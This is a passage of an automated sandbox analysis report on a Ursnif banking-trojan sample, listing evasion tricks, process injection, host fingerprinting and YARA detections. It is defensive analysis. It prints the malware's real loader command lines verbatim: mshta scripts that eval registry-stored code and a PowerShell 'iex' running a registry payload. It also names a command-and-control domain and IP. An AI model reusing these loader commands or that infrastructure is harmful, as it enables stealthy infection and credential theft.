Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5444 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144 Thread sleep count: 3957 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144 Thread sleep count: 4963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960 Thread sleep time: -9223372036854770s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jdlmh2q4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\w34iw342.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yg5i0oy3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4z2qptpk.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2882 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6491 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3957
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4963
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.506175893.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000001A.00000000.544399258.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000001A.00000000.544399258.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: mshta.exe, 00000015.00000002.496071849.000001752B919000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: mshta.exe, 0000000F.00000002.464472467.000001F6467F4000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: AA0000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: D70000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 92E000 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: AA0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: D70000 protect: page execute and read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 92E000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 2988 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 6268 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 8DCB1580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP'
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001A.00000000.516396060.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001A.00000000.506175893.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F32E33 cpuid 0_2_00F32E33
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F36632 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process, 0_2_00F36632
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F36F10 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 0_2_00F36F10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F32E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00F32E33

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality: